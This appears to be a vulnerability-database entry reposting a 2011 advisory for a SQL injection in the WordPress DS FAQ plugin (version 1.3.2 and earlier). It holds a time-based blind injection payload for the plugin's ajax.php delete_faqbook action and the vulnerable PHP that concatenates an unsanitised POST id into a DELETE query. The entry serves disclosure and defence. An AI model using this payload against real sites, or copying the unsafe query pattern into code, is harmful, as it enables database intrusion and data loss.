Wordpress Plugin DS FAQ <= 1.3.2 - SQL Injection Vulnerability

2014-07-01T00:00:00
ID SSV:71979
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title: WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-ds-faq.1.3.2.zip
# Version: 1.3.2 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/wp-ds-faq/ajax.php
 action=delete_faqbook&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
switch($_POST['action']) {

    ...

    case 'delete_faqbook':
        if(!isset($_POST['id'])){ error(); }
        $id = $_POST['id'];

        ...

        $sql = "DELETE FROM `".$table_name."` WHERE `id` = ".$id;
        $results = $wpdb->query( $sql );